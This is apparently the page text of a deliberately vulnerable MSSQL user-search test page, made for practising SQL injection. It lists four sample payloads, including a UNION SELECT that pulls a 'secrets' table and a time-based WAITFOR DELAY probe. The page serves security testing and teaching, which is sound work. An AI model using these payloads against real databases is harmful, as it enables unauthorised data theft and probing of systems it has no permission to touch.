User Search (MSSQL · intentionally vulnerable)

Also works via URL: sqli-test.aspx?q=alice

Executed query:


Try: ' OR '1'='1   ·   ' UNION SELECT id,name,value,NULL FROM secrets --   ·   '; WAITFOR DELAY '0:0:5' --   ·   ' UNION SELECT 1,@@version,3,4 --